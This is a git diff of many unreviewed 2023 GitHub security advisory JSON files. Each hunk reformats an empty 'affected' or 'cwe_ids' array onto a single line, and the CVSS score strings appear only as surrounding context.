+++ b/advisories/unreviewed/2023/09/GHSA-2wv3-fgjg-gj5w/GHSA-2wv3-fgjg-gj5w.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/09/GHSA-559g-r8hh-jrx5/GHSA-559g-r8hh-jrx5.json b/advisories/unreviewed/2023/09/GHSA-559g-r8hh-jrx5/GHSA-559g-r8hh-jrx5.json
index 6d13991ffda..4f035d3c082 100644
--- a/advisories/unreviewed/2023/09/GHSA-559g-r8hh-jrx5/GHSA-559g-r8hh-jrx5.json
+++ b/advisories/unreviewed/2023/09/GHSA-559g-r8hh-jrx5/GHSA-559g-r8hh-jrx5.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/09/GHSA-f4wc-3qj8-gq9p/GHSA-f4wc-3qj8-gq9p.json b/advisories/unreviewed/2023/09/GHSA-f4wc-3qj8-gq9p/GHSA-f4wc-3qj8-gq9p.json
index 4d41826d715..772d3e98124 100644
--- a/advisories/unreviewed/2023/09/GHSA-f4wc-3qj8-gq9p/GHSA-f4wc-3qj8-gq9p.json
+++ b/advisories/unreviewed/2023/09/GHSA-f4wc-3qj8-gq9p/GHSA-f4wc-3qj8-gq9p.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/09/GHSA-vx38-v98v-qh2f/GHSA-vx38-v98v-qh2f.json b/advisories/unreviewed/2023/09/GHSA-vx38-v98v-qh2f/GHSA-vx38-v98v-qh2f.json
index bf8fc9595fe..5e202d02843 100644
--- a/advisories/unreviewed/2023/09/GHSA-vx38-v98v-qh2f/GHSA-vx38-v98v-qh2f.json
+++ b/advisories/unreviewed/2023/09/GHSA-vx38-v98v-qh2f/GHSA-vx38-v98v-qh2f.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/10/GHSA-59mr-825p-2g28/GHSA-59mr-825p-2g28.json b/advisories/unreviewed/2023/10/GHSA-59mr-825p-2g28/GHSA-59mr-825p-2g28.json
index d2be1e5ff61..632c766a91c 100644
--- a/advisories/unreviewed/2023/10/GHSA-59mr-825p-2g28/GHSA-59mr-825p-2g28.json
+++ b/advisories/unreviewed/2023/10/GHSA-59mr-825p-2g28/GHSA-59mr-825p-2g28.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/10/GHSA-5mrw-cpfj-cjh6/GHSA-5mrw-cpfj-cjh6.json b/advisories/unreviewed/2023/10/GHSA-5mrw-cpfj-cjh6/GHSA-5mrw-cpfj-cjh6.json
index 07716d6efdd..5a6e161ee06 100644
--- a/advisories/unreviewed/2023/10/GHSA-5mrw-cpfj-cjh6/GHSA-5mrw-cpfj-cjh6.json
+++ b/advisories/unreviewed/2023/10/GHSA-5mrw-cpfj-cjh6/GHSA-5mrw-cpfj-cjh6.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/10/GHSA-8cgf-r9f6-hj56/GHSA-8cgf-r9f6-hj56.json b/advisories/unreviewed/2023/10/GHSA-8cgf-r9f6-hj56/GHSA-8cgf-r9f6-hj56.json
index 37a3c2678ba..3442cd92e40 100644
--- a/advisories/unreviewed/2023/10/GHSA-8cgf-r9f6-hj56/GHSA-8cgf-r9f6-hj56.json
+++ b/advisories/unreviewed/2023/10/GHSA-8cgf-r9f6-hj56/GHSA-8cgf-r9f6-hj56.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/10/GHSA-9v76-7rmr-76cm/GHSA-9v76-7rmr-76cm.json b/advisories/unreviewed/2023/10/GHSA-9v76-7rmr-76cm/GHSA-9v76-7rmr-76cm.json
index 3efdd06b602..ec1946ac53a 100644
--- a/advisories/unreviewed/2023/10/GHSA-9v76-7rmr-76cm/GHSA-9v76-7rmr-76cm.json
+++ b/advisories/unreviewed/2023/10/GHSA-9v76-7rmr-76cm/GHSA-9v76-7rmr-76cm.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/10/GHSA-jh7f-2hf7-8vxp/GHSA-jh7f-2hf7-8vxp.json b/advisories/unreviewed/2023/10/GHSA-jh7f-2hf7-8vxp/GHSA-jh7f-2hf7-8vxp.json
index 2f2e3344ff5..459642d6248 100644
--- a/advisories/unreviewed/2023/10/GHSA-jh7f-2hf7-8vxp/GHSA-jh7f-2hf7-8vxp.json
+++ b/advisories/unreviewed/2023/10/GHSA-jh7f-2hf7-8vxp/GHSA-jh7f-2hf7-8vxp.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/10/GHSA-p86h-23p7-v2rx/GHSA-p86h-23p7-v2rx.json b/advisories/unreviewed/2023/10/GHSA-p86h-23p7-v2rx/GHSA-p86h-23p7-v2rx.json
index bcdd4af14d1..2873d64410a 100644
--- a/advisories/unreviewed/2023/10/GHSA-p86h-23p7-v2rx/GHSA-p86h-23p7-v2rx.json
+++ b/advisories/unreviewed/2023/10/GHSA-p86h-23p7-v2rx/GHSA-p86h-23p7-v2rx.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/10/GHSA-whr7-4gp3-wpwc/GHSA-whr7-4gp3-wpwc.json b/advisories/unreviewed/2023/10/GHSA-whr7-4gp3-wpwc/GHSA-whr7-4gp3-wpwc.json
index 39fdd000950..129e45e3571 100644
--- a/advisories/unreviewed/2023/10/GHSA-whr7-4gp3-wpwc/GHSA-whr7-4gp3-wpwc.json
+++ b/advisories/unreviewed/2023/10/GHSA-whr7-4gp3-wpwc/GHSA-whr7-4gp3-wpwc.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/10/GHSA-xq99-q5xg-8fq7/GHSA-xq99-q5xg-8fq7.json b/advisories/unreviewed/2023/10/GHSA-xq99-q5xg-8fq7/GHSA-xq99-q5xg-8fq7.json
index d6c18b9a204..b0004ebe16a 100644
--- a/advisories/unreviewed/2023/10/GHSA-xq99-q5xg-8fq7/GHSA-xq99-q5xg-8fq7.json
+++ b/advisories/unreviewed/2023/10/GHSA-xq99-q5xg-8fq7/GHSA-xq99-q5xg-8fq7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/11/GHSA-3g8h-47mp-4839/GHSA-3g8h-47mp-4839.json b/advisories/unreviewed/2023/11/GHSA-3g8h-47mp-4839/GHSA-3g8h-47mp-4839.json
index d3d56f8ae06..eba18c8ea79 100644
--- a/advisories/unreviewed/2023/11/GHSA-3g8h-47mp-4839/GHSA-3g8h-47mp-4839.json
+++ b/advisories/unreviewed/2023/11/GHSA-3g8h-47mp-4839/GHSA-3g8h-47mp-4839.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/11/GHSA-4jmv-jvrv-qcv7/GHSA-4jmv-jvrv-qcv7.json b/advisories/unreviewed/2023/11/GHSA-4jmv-jvrv-qcv7/GHSA-4jmv-jvrv-qcv7.json
index 6b7cefa1405..48bdab96329 100644
--- a/advisories/unreviewed/2023/11/GHSA-4jmv-jvrv-qcv7/GHSA-4jmv-jvrv-qcv7.json
+++ b/advisories/unreviewed/2023/11/GHSA-4jmv-jvrv-qcv7/GHSA-4jmv-jvrv-qcv7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/11/GHSA-5qvm-gfmw-9v64/GHSA-5qvm-gfmw-9v64.json b/advisories/unreviewed/2023/11/GHSA-5qvm-gfmw-9v64/GHSA-5qvm-gfmw-9v64.json
index 9674343765c..c9e1f84fee8 100644
--- a/advisories/unreviewed/2023/11/GHSA-5qvm-gfmw-9v64/GHSA-5qvm-gfmw-9v64.json
+++ b/advisories/unreviewed/2023/11/GHSA-5qvm-gfmw-9v64/GHSA-5qvm-gfmw-9v64.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/11/GHSA-8f7j-g5xp-rc4p/GHSA-8f7j-g5xp-rc4p.json b/advisories/unreviewed/2023/11/GHSA-8f7j-g5xp-rc4p/GHSA-8f7j-g5xp-rc4p.json
index d917bab5e9e..d8dbefe7f18 100644
--- a/advisories/unreviewed/2023/11/GHSA-8f7j-g5xp-rc4p/GHSA-8f7j-g5xp-rc4p.json
+++ b/advisories/unreviewed/2023/11/GHSA-8f7j-g5xp-rc4p/GHSA-8f7j-g5xp-rc4p.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -35,9 +33,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2023/11/GHSA-wc73-qprf-6fv8/GHSA-wc73-qprf-6fv8.json b/advisories/unreviewed/2023/11/GHSA-wc73-qprf-6fv8/GHSA-wc73-qprf-6fv8.json
index 08d51bb9949..a3e8bd16d2e 100644
--- a/advisories/unreviewed/2023/11/GHSA-wc73-qprf-6fv8/GHSA-wc73-qprf-6fv8.json
+++ b/advisories/unreviewed/2023/11/GHSA-wc73-qprf-6fv8/GHSA-wc73-qprf-6fv8.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-276r-vcw2-xfq4/GHSA-276r-vcw2-xfq4.json b/advisories/unreviewed/2023/12/GHSA-276r-vcw2-xfq4/GHSA-276r-vcw2-xfq4.json
index 16a9810ce7a..e960f860522 100644
--- a/advisories/unreviewed/2023/12/GHSA-276r-vcw2-xfq4/GHSA-276r-vcw2-xfq4.json
+++ b/advisories/unreviewed/2023/12/GHSA-276r-vcw2-xfq4/GHSA-276r-vcw2-xfq4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2023/12/GHSA-2cj2-3g3v-rx62/GHSA-2cj2-3g3v-rx62.json b/advisories/unreviewed/2023/12/GHSA-2cj2-3g3v-rx62/GHSA-2cj2-3g3v-rx62.json
index adb2d61073e..4b55d3febcc 100644
--- a/advisories/unreviewed/2023/12/GHSA-2cj2-3g3v-rx62/GHSA-2cj2-3g3v-rx62.json
+++ b/advisories/unreviewed/2023/12/GHSA-2cj2-3g3v-rx62/GHSA-2cj2-3g3v-rx62.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-2gwm-8mq4-p9j4/GHSA-2gwm-8mq4-p9j4.json b/advisories/unreviewed/2023/12/GHSA-2gwm-8mq4-p9j4/GHSA-2gwm-8mq4-p9j4.json
index 6a4198cb61d..91a17296271 100644
--- a/advisories/unreviewed/2023/12/GHSA-2gwm-8mq4-p9j4/GHSA-2gwm-8mq4-p9j4.json
+++ b/advisories/unreviewed/2023/12/GHSA-2gwm-8mq4-p9j4/GHSA-2gwm-8mq4-p9j4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-355p-h43c-hhm8/GHSA-355p-h43c-hhm8.json b/advisories/unreviewed/2023/12/GHSA-355p-h43c-hhm8/GHSA-355p-h43c-hhm8.json
index df2d556e305..5a6d921f60d 100644
--- a/advisories/unreviewed/2023/12/GHSA-355p-h43c-hhm8/GHSA-355p-h43c-hhm8.json
+++ b/advisories/unreviewed/2023/12/GHSA-355p-h43c-hhm8/GHSA-355p-h43c-hhm8.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-3mgx-28wc-mhmx/GHSA-3mgx-28wc-mhmx.json b/advisories/unreviewed/2023/12/GHSA-3mgx-28wc-mhmx/GHSA-3mgx-28wc-mhmx.json
index 11ee7f34baa..89e0f3e7836 100644
--- a/advisories/unreviewed/2023/12/GHSA-3mgx-28wc-mhmx/GHSA-3mgx-28wc-mhmx.json
+++ b/advisories/unreviewed/2023/12/GHSA-3mgx-28wc-mhmx/GHSA-3mgx-28wc-mhmx.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-3vp4-9jc4-q799/GHSA-3vp4-9jc4-q799.json b/advisories/unreviewed/2023/12/GHSA-3vp4-9jc4-q799/GHSA-3vp4-9jc4-q799.json
index cb1191f1c91..53caec1741a 100644
--- a/advisories/unreviewed/2023/12/GHSA-3vp4-9jc4-q799/GHSA-3vp4-9jc4-q799.json
+++ b/advisories/unreviewed/2023/12/GHSA-3vp4-9jc4-q799/GHSA-3vp4-9jc4-q799.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-46jg-h552-883r/GHSA-46jg-h552-883r.json b/advisories/unreviewed/2023/12/GHSA-46jg-h552-883r/GHSA-46jg-h552-883r.json
index 9a0334006a2..c4215165632 100644
--- a/advisories/unreviewed/2023/12/GHSA-46jg-h552-883r/GHSA-46jg-h552-883r.json
+++ b/advisories/unreviewed/2023/12/GHSA-46jg-h552-883r/GHSA-46jg-h552-883r.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-59f8-jjwc-j6hm/GHSA-59f8-jjwc-j6hm.json b/advisories/unreviewed/2023/12/GHSA-59f8-jjwc-j6hm/GHSA-59f8-jjwc-j6hm.json
index c5e7a07806e..4b158a20388 100644
--- a/advisories/unreviewed/2023/12/GHSA-59f8-jjwc-j6hm/GHSA-59f8-jjwc-j6hm.json
+++ b/advisories/unreviewed/2023/12/GHSA-59f8-jjwc-j6hm/GHSA-59f8-jjwc-j6hm.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-63vr-qwf8-72qv/GHSA-63vr-qwf8-72qv.json b/advisories/unreviewed/2023/12/GHSA-63vr-qwf8-72qv/GHSA-63vr-qwf8-72qv.json
index 7baa50c11e3..17056a8c778 100644
--- a/advisories/unreviewed/2023/12/GHSA-63vr-qwf8-72qv/GHSA-63vr-qwf8-72qv.json
+++ b/advisories/unreviewed/2023/12/GHSA-63vr-qwf8-72qv/GHSA-63vr-qwf8-72qv.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-67m9-x7hc-9p5c/GHSA-67m9-x7hc-9p5c.json b/advisories/unreviewed/2023/12/GHSA-67m9-x7hc-9p5c/GHSA-67m9-x7hc-9p5c.json
index 87b9660e417..9a96ef08675 100644
--- a/advisories/unreviewed/2023/12/GHSA-67m9-x7hc-9p5c/GHSA-67m9-x7hc-9p5c.json
+++ b/advisories/unreviewed/2023/12/GHSA-67m9-x7hc-9p5c/GHSA-67m9-x7hc-9p5c.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-6jw3-xmj9-qvcw/GHSA-6jw3-xmj9-qvcw.json b/advisories/unreviewed/2023/12/GHSA-6jw3-xmj9-qvcw/GHSA-6jw3-xmj9-qvcw.json
index 599db9f3d97..fbbff19d5c3 100644
--- a/advisories/unreviewed/2023/12/GHSA-6jw3-xmj9-qvcw/GHSA-6jw3-xmj9-qvcw.json
+++ b/advisories/unreviewed/2023/12/GHSA-6jw3-xmj9-qvcw/GHSA-6jw3-xmj9-qvcw.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-75vw-45w8-6h3g/GHSA-75vw-45w8-6h3g.json b/advisories/unreviewed/2023/12/GHSA-75vw-45w8-6h3g/GHSA-75vw-45w8-6h3g.json
index 8c317fcd129..87d30100271 100644
--- a/advisories/unreviewed/2023/12/GHSA-75vw-45w8-6h3g/GHSA-75vw-45w8-6h3g.json
+++ b/advisories/unreviewed/2023/12/GHSA-75vw-45w8-6h3g/GHSA-75vw-45w8-6h3g.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "CRITICAL",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2023/12/GHSA-8chm-fh64-g5p9/GHSA-8chm-fh64-g5p9.json b/advisories/unreviewed/2023/12/GHSA-8chm-fh64-g5p9/GHSA-8chm-fh64-g5p9.json
index 03b261ae593..ae351294f94 100644
--- a/advisories/unreviewed/2023/12/GHSA-8chm-fh64-g5p9/GHSA-8chm-fh64-g5p9.json
+++ b/advisories/unreviewed/2023/12/GHSA-8chm-fh64-g5p9/GHSA-8chm-fh64-g5p9.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-9hwg-c628-x62j/GHSA-9hwg-c628-x62j.json b/advisories/unreviewed/2023/12/GHSA-9hwg-c628-x62j/GHSA-9hwg-c628-x62j.json
index e68c10413b6..d341597e348 100644
--- a/advisories/unreviewed/2023/12/GHSA-9hwg-c628-x62j/GHSA-9hwg-c628-x62j.json
+++ b/advisories/unreviewed/2023/12/GHSA-9hwg-c628-x62j/GHSA-9hwg-c628-x62j.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-9pw4-548w-gqq4/GHSA-9pw4-548w-gqq4.json b/advisories/unreviewed/2023/12/GHSA-9pw4-548w-gqq4/GHSA-9pw4-548w-gqq4.json
index ec5c192e0fd..327cab1a9eb 100644
--- a/advisories/unreviewed/2023/12/GHSA-9pw4-548w-gqq4/GHSA-9pw4-548w-gqq4.json
+++ b/advisories/unreviewed/2023/12/GHSA-9pw4-548w-gqq4/GHSA-9pw4-548w-gqq4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-c948-477j-77c3/GHSA-c948-477j-77c3.json b/advisories/unreviewed/2023/12/GHSA-c948-477j-77c3/GHSA-c948-477j-77c3.json
index bbe50bb40d9..f99c5f36d97 100644
--- a/advisories/unreviewed/2023/12/GHSA-c948-477j-77c3/GHSA-c948-477j-77c3.json
+++ b/advisories/unreviewed/2023/12/GHSA-c948-477j-77c3/GHSA-c948-477j-77c3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-chfc-x833-27cm/GHSA-chfc-x833-27cm.json b/advisories/unreviewed/2023/12/GHSA-chfc-x833-27cm/GHSA-chfc-x833-27cm.json
index 6a71aa4b4df..d3fbed799e8 100644
--- a/advisories/unreviewed/2023/12/GHSA-chfc-x833-27cm/GHSA-chfc-x833-27cm.json
+++ b/advisories/unreviewed/2023/12/GHSA-chfc-x833-27cm/GHSA-chfc-x833-27cm.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-f6m7-x69c-hp72/GHSA-f6m7-x69c-hp72.json b/advisories/unreviewed/2023/12/GHSA-f6m7-x69c-hp72/GHSA-f6m7-x69c-hp72.json
index aa5f40d5103..61764268b4a 100644
--- a/advisories/unreviewed/2023/12/GHSA-f6m7-x69c-hp72/GHSA-f6m7-x69c-hp72.json
+++ b/advisories/unreviewed/2023/12/GHSA-f6m7-x69c-hp72/GHSA-f6m7-x69c-hp72.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-f8q7-62r4-84qp/GHSA-f8q7-62r4-84qp.json b/advisories/unreviewed/2023/12/GHSA-f8q7-62r4-84qp/GHSA-f8q7-62r4-84qp.json
index 83cb8cbd592..b5d68c18244 100644
--- a/advisories/unreviewed/2023/12/GHSA-f8q7-62r4-84qp/GHSA-f8q7-62r4-84qp.json
+++ b/advisories/unreviewed/2023/12/GHSA-f8q7-62r4-84qp/GHSA-f8q7-62r4-84qp.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-fh32-5f73-8pwm/GHSA-fh32-5f73-8pwm.json b/advisories/unreviewed/2023/12/GHSA-fh32-5f73-8pwm/GHSA-fh32-5f73-8pwm.json
index acebbb226f0..1d6d7e7045c 100644
--- a/advisories/unreviewed/2023/12/GHSA-fh32-5f73-8pwm/GHSA-fh32-5f73-8pwm.json
+++ b/advisories/unreviewed/2023/12/GHSA-fh32-5f73-8pwm/GHSA-fh32-5f73-8pwm.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-frh8-6qgg-hm8v/GHSA-frh8-6qgg-hm8v.json b/advisories/unreviewed/2023/12/GHSA-frh8-6qgg-hm8v/GHSA-frh8-6qgg-hm8v.json
index 0c0d6af5deb..e6e433d4db7 100644
--- a/advisories/unreviewed/2023/12/GHSA-frh8-6qgg-hm8v/GHSA-frh8-6qgg-hm8v.json
+++ b/advisories/unreviewed/2023/12/GHSA-frh8-6qgg-hm8v/GHSA-frh8-6qgg-hm8v.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-gj58-8prx-8h92/GHSA-gj58-8prx-8h92.json b/advisories/unreviewed/2023/12/GHSA-gj58-8prx-8h92/GHSA-gj58-8prx-8h92.json
index 1bb55a5567e..16e67194fed 100644
--- a/advisories/unreviewed/2023/12/GHSA-gj58-8prx-8h92/GHSA-gj58-8prx-8h92.json
+++ b/advisories/unreviewed/2023/12/GHSA-gj58-8prx-8h92/GHSA-gj58-8prx-8h92.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-gp3h-jq5w-chrc/GHSA-gp3h-jq5w-chrc.json b/advisories/unreviewed/2023/12/GHSA-gp3h-jq5w-chrc/GHSA-gp3h-jq5w-chrc.json
index 3554f3aa1e5..73d4f756fea 100644
--- a/advisories/unreviewed/2023/12/GHSA-gp3h-jq5w-chrc/GHSA-gp3h-jq5w-chrc.json
+++ b/advisories/unreviewed/2023/12/GHSA-gp3h-jq5w-chrc/GHSA-gp3h-jq5w-chrc.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-hj8p-rmpx-5rg2/GHSA-hj8p-rmpx-5rg2.json b/advisories/unreviewed/2023/12/GHSA-hj8p-rmpx-5rg2/GHSA-hj8p-rmpx-5rg2.json
index ac55e122208..5c59607db03 100644
--- a/advisories/unreviewed/2023/12/GHSA-hj8p-rmpx-5rg2/GHSA-hj8p-rmpx-5rg2.json
+++ b/advisories/unreviewed/2023/12/GHSA-hj8p-rmpx-5rg2/GHSA-hj8p-rmpx-5rg2.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
